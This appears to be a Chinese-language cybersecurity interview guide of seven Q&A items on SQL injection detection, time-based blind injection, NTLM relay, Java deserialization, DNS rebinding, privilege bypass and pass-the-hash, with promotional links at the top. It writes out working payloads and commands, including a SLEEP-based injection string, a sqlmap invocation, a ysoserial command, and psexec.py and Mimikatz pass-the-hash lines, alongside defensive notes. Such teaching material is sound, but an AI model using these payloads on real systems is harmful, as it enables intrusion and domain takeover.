《網安面試指南》https://mp.weixin.qq.com/s/RIVYDmxI9g_TgGrpbdDKtA?token=1860256701&lang=zh_CN
5000篇網安資料庫https://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247486065&idx=2&sn=b30ade8200e842743339d428f414475e&chksm=c0e4732df793fa3bf39a6eab17cc0ed0fca5f0e4c979ce64bd112762def9ee7cf0112a7e76af&scene=21#wechat_redirect
1. HTTPS流量分析(SQL注入識別)
題目:如何從HTTPS流量中識別SQL注入攻擊?
答案:
- 解密方法:
-
瀏覽器導出SSLKEYLOGFILE,Wireshark配置TLS會話密鑰。
-
解密后篩選HTTP流量,搜索
UNION SELECT
、SLEEP(
等關鍵詞。
-
-
特征:異常長的URL參數、重復的單引號或注釋符(如
--
)。 -
工具:Wireshark、Burp Suite歷史記錄分析。
2. 時間盲注利用
題目:某SQL注入點無回顯但未過濾SLEEP()
,如何盲注獲取數據庫名長度?
答案:
-
Payload:
' AND IF(LENGTH(DATABASE())=8, SLEEP(5), 0)--
-
自動化工具:
sqlmap -u "目標URL" --technique=T --time-sec=5 --dbms=mysql
-
原理:通過響應時間差異判斷條件真假。
3. NTLM Relay攻擊
題目:內網中如何利用NTLM Relay攻擊獲取域控權限?
答案:
- 步驟:
-
使用Responder或Impacket監聽SMB/LDAP請求。
-
觸發目標機器向攻擊者發送NTLM認證(如釣魚鏈接
file://attackIP/惡意文件
)。 -
將NTLM Hash Relay到域控,執行命令(如添加用戶)。
-
-
防御:啟用SMB簽名、限制NTLM使用。
4. 反序列化漏洞(RCE)
題目:某Java應用使用Apache Commons Collections 3.1,如何構造Payload實現RCE?
答案:
-
利用鏈:
InvokerTransformer
鏈觸發Runtime執行命令。 -
工具:使用ysoserial生成Payload:
java -jar ysoserial.jar CommonsCollections5 "cmd.exe /c calc" > payload.bin
-
防御:升級依賴庫、禁用危險反序列化類。
5. DNS Rebinding攻擊
題目:解釋DNS Rebinding攻擊原理及防御方法。
答案:
-
原理:惡意網頁通過短TTL域名綁定到內網IP,繞過同源策略攻擊內網服務。
- 防御:
-
瀏覽器限制DNS解析緩存時間。
-
內網設備禁止響應外部DNS解析請求。
-
應用層校驗Host頭與請求來源IP。
-
6. 垂直越權漏洞
題目:某CMS管理后臺通過/admin
路徑判斷權限,普通用戶請求此路徑返回403。如何繞過?
答案:
-
方法1:偽造Cookie或JWT令牌提升權限(如修改
role=admin
)。 -
方法2:直接訪問后臺API接口(如
/admin/addUser
),繞過前端路由校驗。 -
防御:服務端校驗用戶角色、RBAC權限控制。
7. 內網橫向移動(Pass the Hash)
題目:已獲取內網某主機的NTLM Hash,如何橫向移動到另一臺主機?
答案:
- 工具:
-
psexec.py:
python psexec.py -hashes :<NTLM_Hash> DOMAIN/user@目標IP
-
Mimikatz:
sekurlsa::pth /user:Administrator /domain:test.com /ntlm:HASH
-
-
防御:啟用LSA保護、限制管理員賬戶登錄范圍。